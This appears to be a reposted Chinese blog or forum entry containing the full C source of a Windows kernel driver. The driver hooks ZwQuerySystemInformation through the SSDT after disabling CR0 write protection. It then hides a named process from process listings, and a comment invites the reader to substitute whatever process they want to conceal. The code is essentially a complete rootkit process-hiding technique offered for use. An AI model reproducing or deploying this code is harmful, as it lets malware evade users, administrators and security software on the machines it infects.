- #include "Driver.h"
- #pragma pack(1)
- typedef struct _SSDT_TABLE
- {
- PVOID ServiceTableBase;
- PULONG ServiceCounterTableBase;
- ULONG NumberOfService;
- ULONG ParamTableBase;
- }SSDT_TABLE,* PSSDT_TABLE;
- #pragma pack()
- struct _SYSTEM_THREADS
- {
- LARGE_INTEGER KernelTime;
- LARGE_INTEGER UserTime;
- LARGE_INTEGER CreateTime;
- ULONG WaitTime;
- PVOID StartAddress;
- CLIENT_ID ClientIs;
- KPRIORITY Priority;
- KPRIORITY BasePriority;
- ULONG ContextSwitchCount;
- ULONG ThreadState;
- KWAIT_REASON WaitReason;
- };
- //===================================================
- struct _SYSTEM_PROCESSES
- {
- ULONG NextEntryDelta;
- ULONG ThreadCount;
- ULONG Reserved[6];
- LARGE_INTEGER CreateTime;
- LARGE_INTEGER UserTime;
- LARGE_INTEGER KernelTime;
- UNICODE_STRING ProcessName;
- KPRIORITY BasePriority;
- ULONG ProcessId;
- ULONG InheritedFromProcessId;
- ULONG HandleCount;
- ULONG Reserved2[2];
- VM_COUNTERS VmCounters;
- IO_COUNTERS IoCounters; //windows 2000 only
- struct _SYSTEM_THREADS Threads[1];
- };
- struct _SYSTEM_PROCESSOR_TIMES
- {
- LARGE_INTEGER IdleTime;
- LARGE_INTEGER KernelTime;
- LARGE_INTEGER UserTime;
- LARGE_INTEGER DpcTime;
- LARGE_INTEGER InterruptTime;
- ULONG InterruptCount;
- };
- //======================================================
- typedef NTSTATUS (__stdcall *ZWQUERYSYSTEMINFORMATION)(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength);
- NTSTATUS MyZwQuerySystemInformation(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength);
- //定义全局变量
- extern "C" extern PSSDT_TABLE KeServiceDescriptorTable;
- ULONG OldAddress;
- ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
- PVOID Base;
- //函数申明
- VOID DisplayItsProcessName()
- {
- PEPROCESS Peprocess = PsGetCurrentProcess();
- PTSTR ProcessName = (PTSTR)((ULONG)Peprocess+0x174);
- KdPrint(("The Process :%s/n",ProcessName));
- }
- void UnHook();
- VOID Unload (IN PDRIVER_OBJECT pDriverObject)
- {
- KdPrint(("Enter DriverUnload/n"));
- UnHook(); // mark
- }
- NTSTATUS MyZwQuerySystemInformation(
- IN ULONG SystemInformationClass,
- IN PVOID SystemInformation,
- IN ULONG SystemInformationLength,
- OUT PULONG ReturnLength) //定义自己的Hook函数
- {
- NTSTATUS rc;
- UNICODE_STRING process_name;
- RtlInitUnicodeString(&process_name, L"taskmgr.exe");//改成自己要隐藏的进程名
- rc = (OldZwQuerySystemInformation) (
- SystemInformationClass,
- SystemInformation,
- SystemInformationLength,
- ReturnLength);
-
- if(NT_SUCCESS(rc))
- {
- if(5 == SystemInformationClass)
- {
- struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
- struct _SYSTEM_PROCESSES *prev = NULL;
- if(curr->NextEntryDelta)
- curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);
- while(curr)
- {
-
- if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))
- {
- KdPrint(("hide process'name taskmgr.exe"));
- if(prev)
- {
- if(curr->NextEntryDelta)
- {
- prev->NextEntryDelta += curr->NextEntryDelta;
- }
- else
- {
- prev->NextEntryDelta = 0;
- }
- }
- else
- {
- if(curr->NextEntryDelta)
- {
- SystemInformation =(PVOID)((ULONG)SystemInformation + curr->NextEntryDelta);
- }
- else
- {
- SystemInformation = NULL;
- }
- }
- if(curr->NextEntryDelta)
- curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);
- else
- {
- curr = NULL;
- break;
- }
- }
- if(curr != NULL)
- {
- prev = curr;
- if(curr->NextEntryDelta)
- curr = (_SYSTEM_PROCESSES *)((ULONG)curr + curr->NextEntryDelta);
- else curr = NULL;
- }
- }
- }
- }
- KdPrint(("HookZwQuerySystemInformation is Succeessfully.... /n"));
- DisplayItsProcessName();
- return rc;
- }
- VOID Hook()
- {
- DbgPrint("Entry Hook()/n");
- OldAddress =(ULONG)KeServiceDescriptorTable->ServiceTableBase + 4*0xAd;//用windbg反汇编查到zwquerysysteminformationde
- //的ID号是0xADh
- DbgPrint("KeServiceDescriptorTable->ServiceTableBase is :0x%0x/n",KeServiceDescriptorTable->ServiceTableBase);
- //保存原来函数的地址
- OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) *(ULONG *)OldAddress;
- DbgPrint("OldZwQuerySystemInformation is :0x%0x/n", OldZwQuerySystemInformation);
- DbgPrint("MyZwQuerySystemInformation is :0x%0x/n", MyZwQuerySystemInformation);
- //取消内存写保护
- _asm
- {
- cli
-
- mov eax,cr0
- and eax,not 10000h
- mov cr0,eax
-
- }
-
-
- *(ULONG*)OldAddress =(ULONG) MyZwQuerySystemInformation; //mark MyZwQuerySystemInformation;
-
- //还原内存写保护
- _asm
- {
-
- mov eax,cr0
- or eax,10000h
- mov cr0,eax
- sti
-
-
- }
- }
- void UnHook()
- {
- ULONG Address;
-
- Address =(ULONG) KeServiceDescriptorTable->ServiceTableBase +0xAD*4;
-
- __asm{
- cli
- mov eax,cr0
- and eax,not 10000h
- mov cr0,eax
- }
-
- *(ULONG*)Address =(ULONG) OldZwQuerySystemInformation;
-
- __asm{
- mov eax,cr0
- or eax,10000h
- mov cr0,eax
- sti
- }
-
- DbgPrint("Unhook leave!/n");
-
- }
-
- //========================驱动入口函数
- extern "C" NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath)
- {
- DbgPrint("Entry Hook Function!/n");
- pDriverObject->DriverUnload = Unload;
-
- Hook();
-
- DbgPrint("Leave DriverEntry!/n");
-
- return STATUS_SUCCESS;
-
- }
复制代码
XPSP3 WDK 顺利通过~ 原文地址 http://www.cppblog.com/sleepwom/archive/2009/10/24/99375.aspx |
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
7375
